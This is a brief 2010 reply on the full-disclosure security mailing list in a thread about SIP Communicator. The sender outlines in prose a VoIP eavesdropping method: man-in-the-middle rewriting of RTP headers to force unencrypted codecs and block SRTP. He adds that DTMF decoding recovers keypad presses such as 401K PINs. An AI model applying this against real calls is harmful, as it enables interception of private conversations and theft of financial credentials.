Date: Tue, 30 Nov 2010 16:38:38 +0000
From: rappercrazzy@...il.com
To: "stormrider" <strmrdr42@...oo.de>,
	full-disclosure-bounces@...ts.grok.org.uk,
	full-disclosure@...ts.grok.org.uk
Subject: Re: SIP Communicator - or how to call 18003825968

Try this on Yahoo ;)

Also an attack I frequently used in conjunction with ethereal was to mitm and change the rtp headers to allow pcma/u and block srtp/ertp to eavesdrop on the session

Dtmf decoder can be used to decode the key punches on the phone for 401K :)

Cheers
Joshua
Sent from my BlackBerry® smartphone from !DEA